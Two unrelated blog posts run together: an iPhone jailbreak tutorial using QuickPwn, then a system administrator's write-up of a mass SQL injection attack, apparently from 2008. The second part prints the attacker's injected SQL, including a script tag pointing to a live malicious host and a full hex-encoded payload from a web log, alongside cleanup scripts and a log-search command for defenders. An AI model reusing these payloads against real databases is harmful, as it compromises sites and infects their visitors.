Ok a few notes about QuickPwn.  Compared to Pwnage Tool, it makes it much easier for the novice to jailbreak an iPhone or iPhone 3g or ipod touch.  I did not test this on a “clean” iPhone as mine was already jailbroken the first time.  But, iphone dev doesn’t have any notes that say you can’t do it on clean iphones.  So here is the tutorial on how to do this on an already jailbroken iphone 3g, as always backup first, do at your own risk, yada yada, most likely doing it on a clean iPhone works exactly the same way.

Also you have to be at 2.02 in order for this to work.  I’ll walk you through that update if you haven’t already.

1.

Browse out to http://blog.iphone-dev.org and pull down the QuickPwn file from there site or through bit-torrent.  Remember to use the native archive utility and not “unarchiver”.  Once you have this downloaded and extracted chill out a moment and fire up iTunes.

2. Ask yourself this question: “Do I feel lucky?”  Then decide that you haven’t and backup your iPhone.  You should have already but I wanted to remind you again.

Once you have iTunes started and your iPhone plugged in you should get this message, choose to download and install.

3. Click on Next for the update, as you can see it says “bug fixes”.  Can we get any more generic?

4. Agree to sell your soul to Steve and click next.

5. Now when you do this, you may think, what the hell, the screen disapeared.  Steve’s come to collect my soul early! No like all iTunes downloads it just put it in the download section.

6. Soon as it finishes you’ll get this screen

7. And then this one…

8. And then…

9. Boom done, you’re at 2.02 Apple legit software and if you had any jailbroken apps they are gone.  Your iphone should reboot and you’ll get the old favorite apple logo.

10. Now you can fire up QuickPwn. Double click to launch the goodness.

11. Click Ok that you have been warned. You should know the drill you can’t hold them, or me or anyone else but yourself responsible for bricking your iphone.

12. Keep following ye’ old onscreen instructions, your device should already be connected so just click ok, or it may have just jumped right to detecting your device.  Mine was rebooting when I took this so it popped up right after this.

13. Next it should popup with this screen. Basically it is going to go out and look for the 2.02 firmware on iTunes.  You don’t need to re-download or do anything, I had to close iTunes after a minute, but clicking Yes makes QuickPwn do the work and it worked so I didn’t run into any thing too out of the ordinary aside from not expecting it to fire up iTunes. If you didn’t get this or its finished or you’ve done this before just click the device and it should continue.

14. As mentioned before here and on the dev site you don’t get the option to choose how your custom firmware package is built, this puts it all in.  So put in your username/pass and click “ok.”

15. Ok so I didn’t get the immediate next screenshot, but basically we’re repeating the same steps as you should already know to get your phone into DFU mode.  Follow the steps on screen.  In case you have never done this before, look at your screen you’ll just follow the on screen prompts and if you have problems still check the bottom of this post for a tip on DFU mode.

16. And we’re holding…

17. And we’re holding… and boom, you’ll see it automatically sends the firmware as opposed to the crazy stuff you had to do with Pwnage Tool.

18. And here is where it gets tricky.   It took 2-5 minutes aproximately but it rebooted.  Then my phone just hung there.  I went out and checked online others were saying that they just re-did everything and freaked out.  Some say they waited 20 minutes, or they rebooted and it would continue to just hang at the pinapple.   See below.

19.  For me, I watched it reboot after 5 minutes the first time.  Then it hung there for about 10 minutes.  I started to get pissed, but I held down the home button and power button to turn it off.  I then powered it back on again, let the pinapple sit for a couple minutes and boom.  It came up fine, jailbroken, nothing wrong.   Cydia, Installer, all came back, I didn’t have to restore my music from iTunes after the fact or do anything else wonkey which made the experience much less painful.

If you had problem getting the phone into DFU mode follow DJ Felix’s method:

* Turn off the iPhone
* Hold the home button
* Plug it into USB
* Watch for DFU mode

Anyway Comment below, if you saw something else or experienced something else please share as it could help others.

Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then installs a cookie - its also injecting into whatever database is there, I have not gone through all the code but it has already changed since this morning.  It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental cllicking)***

Here is the code for the new injection:

BEGIN exec(’update ['+@T+'] set ['+@C+']=['+@C+']+””></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://jjmaoduo. 3322.org/csrss/w.js”></script><!–”’)

Notice the beginning of the insert. Its not your traditional <script= its “></title><script src=

Bastards did it to move around the reverse script cleaning method. Here is a modified script taking into account the new “”></title><script src=” code. Oh also notice the closed html comment. This was to fight off the previous </script> for the WHERE clause on the cleaning script.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%<eltit/><”%”, reverse(convert(varchar (max),['+@C+']))) + 9))) where ['+@C+'] like ”%”></title>%<!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below for looking at my references above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(”%tpircs<%”, reverse(convert(varchar (max),['+@C+']))) + 6))) where ['+@C+'] like ”%<script%</script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

To find out which web pages are being hit go to the root of your web logs..

In iis there should be a site identifier that will help you to locate which site it is.

From the root of the web logs issue this command:
(this will search todays logs.. its its yesterday search then)

findstr /s /i /n /c:”declare” ex080807.log &gt;&gt; sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because its not important.. EXCEPT for the http return code

200 is ofcourse OK which means the webserver processes the request.

So a query string in index.asp located in the following website: W3SVC12345678.

You can find out which site that is by going into inetmgr and looking in the site identifier field.

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Comments/Questions etc.  Thanks.